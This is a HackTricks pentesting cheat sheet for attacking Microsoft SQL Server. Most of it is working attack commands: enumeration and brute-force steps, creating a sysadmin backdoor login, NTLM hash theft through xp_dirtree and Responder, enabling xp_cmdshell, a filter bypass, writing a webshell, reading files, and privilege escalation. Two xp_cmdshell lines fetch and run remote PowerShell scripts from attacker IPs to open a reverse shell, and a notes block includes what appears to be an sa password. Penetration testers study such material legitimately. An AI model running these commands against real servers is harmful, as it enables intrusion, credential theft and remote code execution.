# 1433 - Pentesting MSSQL - Microsoft SQL Server
Support HackTricks and get benefits! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
## Basic Information **Microsoft SQL Server** is a **relational database** management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet).\ From [wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server). **Default port:** 1433 ``` 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM ``` ### **Default MS-SQL System Tables** * **master Database**: Records all the system-level information for an instance of SQL Server. * **msdb Database**: Is used by SQL Server Agent for scheduling alerts and jobs. * **model Database**: Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards. * **Resource Databas**: Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database. * **tempdb Database** : Is a work-space for holding temporary objects or intermediate result sets. ## Enumeration ### Automatic Enumeration If you don't know nothing about the service: ```bash nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 msf> use auxiliary/scanner/mssql/mssql_ping ``` If you **don't** **have credentials** you can try to guess them. You can use nmap or metasploit. Be careful, you can **block accounts** if you fail login several times using an existing username. ### [**Brute force**](../generic-methodologies-and-resources/brute-force.md#sql-server) ### Authenticated Enumeration #### Manual ```sql SELECT name FROM master.dbo.sysdatabases #Get databases SELECT * FROM .INFORMATION_SCHEMA.TABLES; #Get table names #List Linked Servers EXEC sp_linkedservers SELECT * FROM sys.servers; #List users select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name; #Create user with sysadmin privs CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!' sp_addsrvrolemember 'hacker', 'sysadmin' ``` #### Mssqlclient.py You can login into the service using **impacket mssqlclient.py** ```bash mssqlclient.py -db volume -windows-auth /:@ #Recommended -windows-auth when you are going to use a domain. use as domain the netBIOS name of the machine #Once logged in you can run queries: SQL> select @@version; #Steal NTLM hash sudo responder -I #Run that in other console SQL> exec master..xp_dirtree '\\\test' #Steal the NTLM hash, crack it with john or hashcat #Try to enable code execution SQL> enable_xp_cmdshell #Execute code, 2 sintax, for complex and non complex cmds SQL> xp_cmdshell whoami /all SQL> EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile' ``` #### sqsh ```bash sqsh -S -U -P -D sqsh -S -U .\\ -P -D #In case Windows Auth using "." as domain na,e for local user ``` ![](<../.gitbook/assets/image (20) (1).png>) #### Metasploit ```bash #Set USERNAME, RHOSTS and PASSWORD #Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used #Steal NTLM msf> use auxiliary/admin/mssql/mssql_ntlm_stealer #Steal NTLM hash, before executing run Responder #Info gathering msf> use admin/mssql/mssql_enum #Security checks msf> use admin/mssql/mssql_enum_domain_accounts msf> use admin/mssql/mssql_enum_sql_logins msf> use auxiliary/admin/mssql/mssql_findandsampledata msf> use auxiliary/scanner/mssql/mssql_hashdump msf> use auxiliary/scanner/mssql/mssql_schemadump #Search for insteresting data msf> use auxiliary/admin/mssql/mssql_findandsampledata msf> use auxiliary/admin/mssql/mssql_idf #Privesc msf> use exploit/windows/mssql/mssql_linkcrawler msf> use admin/mssql/mssql_escalate_execute_as #If the user has IMPERSONATION privilege, this will try to escalate msf> use admin/mssql/mssql_escalate_dbowner #Escalate from db_owner to sysadmin #Code execution msf> use admin/mssql/mssql_exec #Execute commands msf> use exploit/windows/mssql/mssql_payload #Uploads and execute a payload #Add new admin user from meterpreter session msf> use windows/manage/mssql_local_auth_bypass ``` ## Tricks ### Execute commands ```bash #Username + Password + CMD command crackmapexec mssql -d -u -p -x "whoami" #Username + Hash + PS command crackmapexec mssql -d -u -H -X '$PSVersionTable' # Check if xp_cmdshell is enabled SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'; #this turns on advanced options and is needed to configure xp_cmdshell sp_configure 'show advanced options', '1' RECONFIGURE #this enables xp_cmdshell sp_configure 'xp_cmdshell', '1' RECONFIGURE # Quickly check what the service account is via xp_cmdshell EXEC master..xp_cmdshell 'whoami' # Bypass blackisted "EXEC xp_cmdshell" ‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ — ``` ### NTLM Service Hash gathering [You can extract the](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [**NTLM hash**](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/) [of the user making the service authenticate against you.](https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/)\ You should start a **SMB server** to capture the hash used in the authentication (impacket-smbserver or responder for example). ```bash xp_dirtree '\\\any\thing' exec master.dbo.xp_dirtree '\\\any\thing' EXEC master..xp_subdirs '\\\anything\' # Capture hash sudo responder -I tun0 sudo impacket-smbserver share ./ -smb2support msf> use auxiliary/admin/mssql/mssql_ntlm_stealer ``` ### Abusing MSSQL trusted Links [**Read this post**](../windows-hardening/active-directory-methodology/abusing-ad-mssql.md) **to find more information about how to abuse this feature** ### **Write Files** To write files using `MSSQL`, we **need to enable** [**Ole Automation Procedures**](https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/ole-automation-procedures-server-configuration-option), which requires admin privileges, and then execute some stored procedures to create the file: ```bash # Enable Ole Automation Procedures sp_configure 'show advanced options', 1 GO RECONFIGURE GO sp_configure 'Ole Automation Procedures', 1 GO RECONFIGURE GO # Create a File DECLARE @OLE INT DECLARE @FileID INT EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1 EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '' EXECUTE sp_OADestroy @FileID EXECUTE sp_OADestroy @OLE GO ``` ### **Read file with** OPENROWSET By default, `MSSQL` allows file **read on any file in the operating system to which the account has read access**. We can use the following SQL query: ```sql SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents GO ``` ### **Read files executing scripts (Python and R)** MSSQL could allow you to execute **scripts in Python and/or R**. These code will be executed by a **different user** than the one using **xp\_cmdshell** to execute commands. Example trying to execute a **'R'** _"Hellow World!"_ **not working**: ![](<../.gitbook/assets/image (185).png>) Example using configured python to perform several actions: ```sql #Print the user being used (and execute commands) EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("getpass").getuser())' EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("whoami"))' #Open and read a file EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' #Multiline EXECUTE sp_execute_external_script @language = N'Python', @script = N' import sys print(sys.version) ' GO ``` ### From db\_owner to sysadmin [If you have the](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**credentials of a db\_owner user**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/)[, you can become](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**sysadmin**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [and](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) [**execute commands**](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/) ```bash msf> use auxiliary/admin/mssql/mssql_escalate_dbowner ``` ### Impersonation of other users [IMPERSONATE privilege can lead to privilege escalation in SQL Server.](https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/) SQL Server has a special permission, named **`IMPERSONATE`**, that **allows the executing user to take on the permissions of another user** or login until the context is reset or the session ends. #### Identify users to impersonate ``` 1> SELECT distinct b.name 2> FROM sys.server_permissions a 3> INNER JOIN sys.server_principals b 4> ON a.grantor_principal_id = b.principal_id 5> WHERE a.permission_name = 'IMPERSONATE' 6> GO name ----------------------------------------------- sa john ``` Note how from the previous results you can see that you can **impersonate the user "sa".** #### Impersonate sa user ``` 1> EXECUTE AS LOGIN = 'sa' 2> SELECT SYSTEM_USER 3> SELECT IS_SRVROLEMEMBER('sysadmin') 4> GO ``` {% hint style="info" %} If you can impersonate a user, even if he isn't sysadmin, you should check i**f the user has access** to other **databases** or linked servers. {% endhint %} #### Automatically ```bash msf> auxiliary/admin/mssql/mssql_escalate_execute_as ``` ### Using MSSQL for Persistence [https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/](https://blog.netspi.com/sql-server-persistence-part-1-startup-stored-procedures/) ### Other ways for RCE There are other methods to get command execution, such as adding [extended stored procedures](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assemblies](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent Jobs](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15), and [external scripts](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql). ## Post Explotation The user running MSSQL server will have enabled the privilege token **SeImpersonatePrivilege.**\ You probably will be able to escalate to Administrator using this token: [Juicy-potato](https://github.com/ohpe/juicy-potato) ## Shodan * `port:1433 !HTTP` ## HackTricks Automatic Commands ``` Protocol_Name: MSSQL #Protocol Abbreviation if there is one. Port_Number: 1433 #Comma separated if there is more than one. Protocol_Description: Microsoft SQL Server #Protocol Abbreviation Spelled out Entry_1: Name: Notes Description: Notes for MSSQL Note: | Microsoft SQL Server is a relational database management system developed by Microsoft. As a database server, it is a software product with the primary function of storing and retrieving data as requested by other software applications—which may run either on the same computer or on another computer across a network (including the Internet). #sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G ###the goal is to get xp_cmdshell working### 1. try and see if it works xp_cmdshell `whoami` go 2. try to turn component back on EXEC SP_CONFIGURE 'xp_cmdshell' , 1 reconfigure go xp_cmdshell `whoami` go 3. 'advanced' turn it back on EXEC SP_CONFIGURE 'show advanced options', 1 reconfigure go EXEC SP_CONFIGURE 'xp_cmdshell' , 1 reconfigure go xp_cmdshell 'whoami' go xp_cmdshell "powershell.exe -exec bypass iex(new-object net.webclient).downloadstring('http://10.10.14.60:8000/ye443.ps1')" https://book.hacktricks.xyz/pentesting/pentesting-mssql-microsoft-sql-server Entry_2: Name: Nmap for SQL Description: Nmap with SQL Scripts Command: nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 {IP} Entry_3: Name: MSSQL consolesless mfs enumeration Description: MSSQL enumeration without the need to run msfconsole Note: sourced from https://github.com/carlospolop/legion Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_enum; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use admin/mssql/mssql_enum_domain_accounts; set RHOSTS {IP}; set RPORT ; run; exit' &&msfconsole -q -x 'use admin/mssql/mssql_enum_sql_logins; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_dbowner; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_escalate_execute_as; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_exec; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/admin/mssql/mssql_findandsampledata; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_hashdump; set RHOSTS {IP}; set RPORT ; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_schemadump; set RHOSTS {IP}; set RPORT ; run; exit' ```
Support HackTricks and get benefits! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**